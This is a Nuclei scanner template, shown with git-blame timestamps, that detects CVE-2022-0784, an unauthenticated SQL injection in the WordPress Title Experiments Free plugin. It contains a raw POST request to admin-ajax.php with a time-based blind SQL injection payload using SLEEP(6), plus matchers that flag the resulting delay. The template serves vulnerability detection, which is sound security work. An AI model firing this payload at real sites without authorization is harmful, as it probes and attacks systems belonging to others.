nuclei-templates/cves/2022/CVE-2022-0784.yaml

42 lines
1.5 KiB
YAML
Raw Normal View History

2023-01-01 12:46:16 +00:00
id: CVE-2022-0784
info:
name: WordPress Title Experiments Free <9.0.1 - SQL Injection
2023-01-01 12:46:16 +00:00
author: theamanrawat
severity: critical
description: |
WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-01-01 12:46:16 +00:00
reference:
- https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
- https://wordpress.org/plugins/wp-experiments-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0784
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-01-01 12:46:16 +00:00
cve-id: CVE-2022-0784
cwe-id: CWE-89
2023-01-01 12:46:16 +00:00
metadata:
verified: "true"
tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress
2023-01-01 12:46:16 +00:00
requests:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-01-01 12:49:23 +00:00
action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)
2023-01-01 12:46:16 +00:00
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"images\":")'
2023-01-03 11:56:30 +00:00
condition: and
# Enhanced by md on 2023/01/06